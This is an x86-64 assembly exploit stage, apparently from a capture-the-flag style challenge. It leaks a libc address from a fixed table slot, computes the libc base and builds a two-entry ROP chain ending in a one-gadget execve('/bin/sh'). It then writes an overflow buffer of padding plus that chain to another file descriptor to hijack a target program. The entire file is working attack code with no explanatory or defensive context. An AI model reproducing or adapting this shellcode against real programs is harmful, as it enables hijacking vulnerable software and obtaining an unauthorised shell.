bits 64

section .text

global _start

_start:
    ; rbx <= read's address
    mov rbx, [0x602060]

    ; rbx <= libc base address
    sub rbx, 0xf7250

    ; rax <= 0 (one_gadget constraint)
    mov rcx, rbx
    add rcx, 0x8b8c5
    mov [0x602100], rcx

    ; one-gadget execve("/bin/sh", ...)
    mov rcx, rbx
    add rcx, 0x45216
    mov [0x602108], rcx

    jmp buffer

write:
    ; write the first part of buffer
    mov rdi, [rbp-0x2c]
    pop rsi
    mov rdx, 125
    mov rax, 1
    syscall

    ; write the ROP chain
    mov rdi, [rbp-0x2c]
    mov rsi, 0x602100
    mov rdx, 16
    mov rax, 1
    syscall

loop:
    jmp loop

buffer:
    call write
    db 0x0a, 0x88, 0x00, 0x00, 0x00, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB"

